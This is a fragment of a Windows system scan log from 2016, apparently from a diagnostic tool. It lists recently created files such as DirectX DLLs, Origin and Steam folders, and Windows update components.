2016-06-23 21:20 - 2007-10-22 03:37 - 00021000 _____ (Microsoft Corporation) C:\Windows\system32\X3DAudio1_2.dll
2016-06-23 21:20 - 2007-10-22 03:37 - 00017928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\X3DAudio1_2.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 05081608 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_36.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 03734536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_36.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 02006552 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_36.dll
2016-06-23 21:20 - 2007-10-12 15:14 - 01374232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_36.dll
2016-06-23 21:20 - 2007-10-02 09:56 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_36.dll
2016-06-23 21:20 - 2007-10-02 09:56 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_36.dll
2016-06-23 21:20 - 2007-07-20 00:57 - 00411496 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_9.dll
2016-06-23 21:20 - 2007-07-20 00:57 - 00267112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_9.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 05073256 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 03727720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 01985904 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 01358192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 00508264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_35.dll
2016-06-23 21:20 - 2007-07-19 18:14 - 00444776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_35.dll
2016-06-23 21:20 - 2007-06-20 20:49 - 00409960 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_8.dll
2016-06-23 21:20 - 2007-06-20 20:46 - 00266088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_8.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 04496232 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 03497832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 01401200 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 01124720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_34.dll
2016-06-23 21:20 - 2007-05-16 16:45 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_34.dll
2016-06-23 21:20 - 2007-04-04 18:55 - 00403304 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_7.dll
2016-06-23 21:20 - 2007-04-04 18:55 - 00261480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_7.dll
2016-06-23 21:20 - 2007-04-04 18:54 - 00107368 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_3.dll
2016-06-23 21:20 - 2007-04-04 18:53 - 00081768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_3.dll
2016-06-23 21:20 - 2007-03-15 16:57 - 00506728 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10_33.dll
2016-06-23 21:20 - 2007-03-15 16:57 - 00443752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 04494184 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 03495784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 01400176 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_33.dll
2016-06-23 21:20 - 2007-03-12 16:42 - 01123696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_33.dll
2016-06-23 21:20 - 2007-03-05 12:42 - 00017688 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_1.dll
2016-06-23 21:20 - 2007-03-05 12:42 - 00015128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_1.dll
2016-06-23 21:20 - 2007-01-24 15:27 - 00393576 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_6.dll
2016-06-23 21:20 - 2007-01-24 15:27 - 00255848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_6.dll
2016-06-23 21:20 - 2006-12-08 12:02 - 00251672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_5.dll
2016-06-23 21:20 - 2006-12-08 12:00 - 00390424 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_5.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 04398360 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_32.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 03426072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_32.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 00469264 _____ (Microsoft Corporation) C:\Windows\system32\d3dx10.dll
2016-06-23 21:20 - 2006-11-29 13:06 - 00440080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx10.dll
2016-06-23 21:20 - 2006-09-28 16:05 - 03977496 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_31.dll
2016-06-23 21:20 - 2006-09-28 16:05 - 02414360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_31.dll
2016-06-23 21:20 - 2006-09-28 16:05 - 00237848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_4.dll
2016-06-23 21:20 - 2006-09-28 16:04 - 00364824 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_4.dll
2016-06-23 21:20 - 2006-07-28 09:31 - 00083736 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_2.dll
2016-06-23 21:20 - 2006-07-28 09:30 - 00363288 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_3.dll
2016-06-23 21:20 - 2006-07-28 09:30 - 00236824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_3.dll
2016-06-23 21:20 - 2006-07-28 09:30 - 00062744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_2.dll
2016-06-23 21:20 - 2006-05-31 07:24 - 00230168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_2.dll
2016-06-23 21:20 - 2006-05-31 07:22 - 00354072 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_2.dll
2016-06-23 21:20 - 2006-03-31 12:41 - 03927248 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_30.dll
2016-06-23 21:20 - 2006-03-31 12:40 - 02388176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_30.dll
2016-06-23 21:20 - 2006-03-31 12:40 - 00352464 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_1.dll
2016-06-23 21:20 - 2006-03-31 12:39 - 00229584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_1.dll
2016-06-23 21:20 - 2006-03-31 12:39 - 00083664 _____ (Microsoft Corporation) C:\Windows\system32\xinput1_1.dll
2016-06-23 21:20 - 2006-03-31 12:39 - 00062672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xinput1_1.dll
2016-06-23 21:20 - 2006-02-03 08:43 - 03830992 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_29.dll
2016-06-23 21:20 - 2006-02-03 08:43 - 02332368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_29.dll
2016-06-23 21:20 - 2006-02-03 08:42 - 00355536 _____ (Microsoft Corporation) C:\Windows\system32\xactengine2_0.dll
2016-06-23 21:20 - 2006-02-03 08:42 - 00230096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xactengine2_0.dll
2016-06-23 21:20 - 2006-02-03 08:41 - 00016592 _____ (Microsoft Corporation) C:\Windows\system32\x3daudio1_0.dll
2016-06-23 21:20 - 2006-02-03 08:41 - 00014032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\x3daudio1_0.dll
2016-06-23 21:20 - 2005-12-05 18:09 - 03815120 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_28.dll
2016-06-23 21:20 - 2005-12-05 18:09 - 02323664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_28.dll
2016-06-23 21:20 - 2005-07-22 19:59 - 03807440 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_27.dll
2016-06-23 21:20 - 2005-07-22 19:59 - 02319568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_27.dll
2016-06-23 21:20 - 2005-05-26 15:34 - 03767504 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_26.dll
2016-06-23 21:20 - 2005-05-26 15:34 - 02297552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_26.dll
2016-06-23 21:20 - 2005-03-18 17:19 - 03823312 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_25.dll
2016-06-23 21:20 - 2005-03-18 17:19 - 02337488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_25.dll
2016-06-23 21:20 - 2005-02-05 19:45 - 03544272 _____ (Microsoft Corporation) C:\Windows\system32\d3dx9_24.dll
2016-06-23 21:20 - 2005-02-05 19:45 - 02222800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3dx9_24.dll
2016-06-23 20:12 - 2016-06-27 17:18 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Origin
2016-06-23 20:12 - 2016-06-23 20:13 - 00000000 ____D C:\Program Files (x86)\Origin Games
2016-06-23 20:11 - 2016-06-27 17:18 - 00000000 ____D C:\Users\User not found\AppData\Local\Origin
2016-06-23 19:54 - 2016-07-04 16:30 - 00000000 ____D C:\ProgramData\Origin
2016-06-23 19:54 - 2016-06-23 19:54 - 00000991 _____ C:\Users\Public\Desktop\Origin.lnk
2016-06-23 19:54 - 2016-06-23 19:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2016-06-23 19:54 - 2016-06-23 19:54 - 00000000 ____D C:\ProgramData\Electronic Arts
2016-06-23 19:53 - 2016-07-16 13:35 - 00000000 ____D C:\ProgramData\Package Cache
2016-06-23 19:52 - 2016-06-23 20:11 - 00000000 ____D C:\Program Files (x86)\Origin
2016-06-23 19:34 - 2016-07-16 14:20 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-06-23 19:34 - 2016-07-12 19:20 - 00003718 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-06-21 17:20 - 2016-07-13 15:43 - 00000000 ____D C:\Users\User not found\Documents\Sony Vegas - Voice Record
2016-06-21 17:06 - 2016-07-02 21:13 - 00000132 _____ C:\Users\User not found\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-06-21 16:55 - 2016-06-21 16:55 - 00000000 ____D C:\Users\User not found\AppData\LocalLow\Adobe
2016-06-21 16:33 - 2016-06-21 16:34 - 362168352 _____ C:\Users\User not found\Downloads\Rocket League®_20160621003625.mp4
2016-06-21 16:12 - 2016-06-21 16:12 - 00000000 ____D C:\Users\User not found\AppData\Local\GWX
2016-06-20 19:00 - 2016-06-27 21:57 - 00000122 _____ C:\Users\User not found\Desktop\Musicas.txt
2016-06-20 16:11 - 2016-06-20 16:11 - 00000219 _____ C:\Users\User not found\Desktop\Counter-Strike Global Offensive.url
2016-06-20 16:11 - 2016-06-20 16:11 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-06-20 14:45 - 2016-06-20 14:45 - 00226472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSPerf140.dll
2016-06-20 14:22 - 2016-06-20 14:30 - 00000000 ___SD C:\Windows\system32\GWX
2016-06-20 14:22 - 2016-06-20 14:22 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-06-20 14:22 - 2016-06-20 14:22 - 00000000 ____D C:\Windows\system32\appraiser
2016-06-20 13:51 - 2016-06-20 13:51 - 00279720 _____ (Microsoft Corporation) C:\Windows\system32\VSPerf140.dll
2016-06-20 13:34 - 2016-06-20 13:34 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_iBtFltCoex_01009.Wdf
2016-06-20 13:31 - 2016-06-20 13:31 - 00000000 ____D C:\iBTWU
2016-06-20 13:24 - 2015-01-06 04:01 - 00072192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndproxy.sys
2016-06-20 13:24 - 2015-01-06 03:59 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wanarp.sys
2016-06-20 13:24 - 2015-01-06 02:12 - 00185856 _____ (Microsoft Corporation) C:\Windows\system32\rascfg.dll
2016-06-20 13:24 - 2015-01-06 02:02 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rascfg.dll
2016-06-20 13:19 - 2015-12-30 22:53 - 02017624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2016-06-20 13:19 - 2015-09-29 13:24 - 00155480 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\tpm.sys
2016-06-20 13:19 - 2015-04-30 00:22 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\WiFiDisplay.dll
2016-06-20 13:19 - 2015-03-09 03:02 - 00057856 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\bthhfenum.sys
2016-06-20 13:19 - 2015-01-27 04:44 - 00933888 _____ (Microsoft Corporation) C:\Windows\system32\calc.exe
2016-06-20 13:19 - 2015-01-24 02:51 - 00816128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\calc.exe
2016-06-20 13:18 - 2016-02-02 19:16 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2016-06-20 13:18 - 2016-01-09 02:38 - 00091992 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2016-06-20 13:18 - 2015-12-16 18:11 - 01200128 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Globalization.dll
2016-06-20 13:18 - 2015-12-16 17:51 - 00868864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Globalization.dll
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\kbdgeoqw.dll
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZST.DLL
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2016-06-20 13:18 - 2015-10-22 18:43 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZST.DLL
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2016-06-20 13:18 - 2015-10-22 17:59 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2016-06-20 13:18 - 2015-10-22 17:21 - 00323072 _____ (Microsoft Corporation) C:\Windows\system32\GlobCollationHost.dll
2016-06-20 13:18 - 2015-10-22 16:58 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GlobCollationHost.dll
2016-06-20 13:18 - 2015-10-22 15:08 - 00513456 _____ C:\Windows\SysWOW64\locale.nls
2016-06-20 13:18 - 2015-10-22 15:08 - 00513456 _____ C:\Windows\system32\locale.nls
2016-06-20 13:18 - 2015-05-07 17:47 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2016-06-20 13:18 - 2015-05-07 16:21 - 00522240 _____ (Microsoft Corporation) C:\Windows\system32\GeofenceMonitorService.dll
2016-06-20 13:18 - 2015-05-07 16:05 - 00367104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GeofenceMonitorService.dll
2016-06-20 13:18 - 2015-04-10 01:34 - 02256896 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2016-06-20 13:18 - 2015-04-10 01:11 - 01943040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2016-06-20 13:18 - 2015-03-11 02:49 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2016-06-20 13:18 - 2015-03-11 02:09 - 00021504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2016-06-20 13:18 - 2014-12-19 09:57 - 00788680 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-06-20 13:18 - 2014-12-19 09:25 - 00602776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll
2016-06-20 13:17 - 2016-01-24 19:19 - 00419160 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\spaceport.sys
2016-06-20 13:17 - 2016-01-24 19:19 - 00331608 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys
2016-06-20 13:17 - 2016-01-24 12:57 - 01335296 _____ (Microsoft Corporation) C:\Windows\system32\mispace.dll
2016-06-20 13:17 - 2016-01-24 12:45 - 01063424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mispace.dll
2016-06-20 13:17 - 2015-09-04 20:24 - 00154112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tunnel.sys
2016-06-20 13:17 - 2015-08-06 17:47 - 04710400 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2016-06-20 13:17 - 2015-08-06 17:18 - 04068352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll
2016-06-20 13:16 - 2016-01-21 20:35 - 00952928 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2016-06-20 13:16 - 2016-01-21 19:42 - 00786152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2016-06-20 13:15 - 2016-06-03 18:11 - 00472576 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2016-06-20 13:15 - 2016-06-03 14:38 - 01413120 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-06-20 13:15 - 2016-06-02 18:51 - 00050352 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-06-20 13:15 - 2016-05-29 16:04 - 01204224 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00569856 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00544256 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2016-06-20 13:15 - 2016-05-29 16:04 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-06-20 13:15 - 2016-03-28 14:21 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-06-20 13:15 - 2016-02-05 15:46 - 01455104 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe
2016-06-20 13:15 - 2015-09-03 03:18 - 02531400 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2016-06-20 13:15 - 2015-09-03 03:17 - 01903848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2016-06-20 13:15 - 2015-08-28 23:20 - 00183368 _____ (Microsoft Corporation) C:\Windows\system32\AuthHost.exe
2016-06-20 13:15 - 2015-07-22 15:19 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-06-20 13:15 - 2015-07-22 14:52 - 01633792 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-06-20 13:15 - 2015-07-17 15:15 - 00951296 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2016-06-20 13:15 - 2015-07-17 15:10 - 00749568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdh.dll
2016-06-20 13:15 - 2015-03-20 02:56 - 00080384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ahcache.sys
2016-06-20 13:15 - 2015-01-29 02:58 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\photowiz.dll
2016-06-20 13:15 - 2015-01-29 02:29 - 00290816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\photowiz.dll
2016-06-20 13:14 - 2015-03-04 02:32 - 00172544 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2016-06-20 13:14 - 2015-03-04 02:12 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2016-06-20 13:14 - 2015-03-02 02:43 - 00222208 _____ (Microsoft Corporation) C:\Windows\system32\rastapi.dll
2016-06-20 13:14 - 2015-03-02 02:21 - 00207872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastapi.dll
2016-06-20 13:13 - 2016-06-20 13:13 - 00000000 ____D C:\Users\User not found\AppData\Roaming\MPC-HC
2016-06-20 13:13 - 2016-02-03 16:14 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\IPMIDrv.sys
2016-06-20 13:13 - 2016-02-02 18:51 - 00162304 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-06-20 13:13 - 2016-02-02 18:19 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2016-06-20 13:13 - 2016-02-02 18:01 - 00031744 _____ (Microsoft Corporation) C:\Windows\system32\WsmAgent.dll
2016-06-20 13:13 - 2016-02-02 17:51 - 02609152 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-06-20 13:13 - 2016-02-02 17:48 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-06-20 13:13 - 2016-02-02 17:46 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAgent.dll
2016-06-20 13:13 - 2016-02-02 17:41 - 02170880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2016-06-20 13:13 - 2016-02-02 17:39 - 00236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2016-06-20 13:13 - 2016-01-09 02:49 - 00218448 _____ (Microsoft Corporation) C:\Windows\system32\rsaenh.dll
2016-06-20 13:13 - 2016-01-09 02:49 - 00192120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rsaenh.dll
2016-06-20 13:13 - 2015-04-01 23:22 - 02985984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbgeng.dll
2016-06-20 13:13 - 2015-04-01 23:20 - 04417536 _____ (Microsoft Corporation) C:\Windows\system32\dbgeng.dll
2016-06-20 13:13 - 2015-04-01 04:45 - 01491456 _____ (Microsoft Corporation) C:\Windows\system32\dbghelp.dll
2016-06-20 13:13 - 2015-04-01 03:31 - 01207296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbghelp.dll
2016-06-20 13:12 - 2016-04-12 16:46 - 14467584 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-06-20 13:12 - 2016-04-12 16:30 - 12879872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-06-20 13:12 - 2016-04-10 06:35 - 00551256 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\vhdmp.sys
2016-06-20 13:12 - 2016-04-09 23:15 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\wfapigp.dll
2016-06-20 13:12 - 2016-04-09 23:14 - 00306176 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Geolocation.dll
2016-06-20 13:12 - 2016-04-09 23:10 - 00816128 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2016-06-20 13:12 - 2016-04-09 23:09 - 00754176 _____ (Microsoft Corporation) C:\Windows\system32\FirewallAPI.dll
2016-06-20 13:12 - 2016-04-09 23:02 - 00346112 _____ (Microsoft Corporation) C:\Windows\system32\LocationApi.dll
2016-06-20 13:12 - 2016-04-09 22:59 - 00218112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Geolocation.dll
2016-06-20 13:12 - 2016-04-09 22:59 - 00020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfapigp.dll
2016-06-20 13:12 - 2016-04-09 22:56 - 00543232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FirewallAPI.dll
2016-06-20 13:12 - 2016-04-09 22:55 - 00881152 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2016-06-20 13:12 - 2016-04-09 22:52 - 00281088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LocationApi.dll
2016-06-20 13:12 - 2016-04-07 17:34 - 00987136 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-06-20 13:12 - 2016-04-07 17:06 - 00927744 _____ (Microsoft Corporation) C:\Windows\system32\iphlpsvc.dll
2016-06-20 13:12 - 2016-04-07 16:36 - 00800768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-06-20 13:12 - 2016-04-06 22:21 - 00114528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mup.sys
2016-06-20 13:12 - 2016-04-06 19:20 - 00559104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\csc.sys
2016-06-20 13:12 - 2016-04-06 19:20 - 00402432 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdbss.sys
2016-06-20 13:12 - 2016-04-06 19:17 - 18825216 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2016-06-20 13:12 - 2016-04-06 17:25 - 15158272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2016-06-20 13:12 - 2016-04-05 23:37 - 00205824 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndiswan.sys
2016-06-20 13:12 - 2016-04-02 15:09 - 00130560 _____ (Microsoft Corporation) C:\Windows\system32\BdeHdCfg.exe
2016-06-20 13:12 - 2016-04-02 14:58 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\BdeHdCfgLib.dll
2016-06-20 13:12 - 2016-04-01 18:40 - 00322048 _____ (Microsoft Corporation) C:\Windows\system32\fvecpl.dll
2016-06-20 13:12 - 2016-04-01 18:00 - 00840704 _____ (Microsoft Corporation) C:\Windows\system32\netlogon.dll
2016-06-20 13:12 - 2016-04-01 17:53 - 00348672 _____ (Microsoft Corporation) C:\Windows\system32\bdesvc.dll
2016-06-20 13:12 - 2016-04-01 17:50 - 00737280 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2016-06-20 13:12 - 2016-04-01 17:41 - 00696832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netlogon.dll
2016-06-20 13:12 - 2016-03-31 07:53 - 07446360 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-06-20 13:12 - 2016-03-31 07:51 - 01134776 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-06-20 13:12 - 2016-03-31 05:36 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-06-20 13:12 - 2016-02-09 02:31 - 22365472 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-06-20 13:12 - 2016-02-09 02:31 - 19794896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-06-20 13:12 - 2016-02-09 02:31 - 02757616 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-06-20 13:12 - 2016-02-09 02:31 - 02412576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-06-20 13:12 - 2016-02-09 02:31 - 00273264 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlows.exe
2016-06-20 13:12 - 2016-02-08 21:55 - 02712576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll
2016-06-20 13:12 - 2016-02-08 21:15 - 02551808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themecpl.dll
2016-06-20 13:12 - 2016-02-08 21:02 - 01197056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usercpl.dll
2016-06-20 13:12 - 2016-02-08 20:43 - 00524288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncHost.exe
2016-06-20 13:12 - 2016-02-08 20:40 - 00539648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hgcpl.dll
2016-06-20 13:12 - 2016-02-08 20:39 - 00305152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\stobject.dll
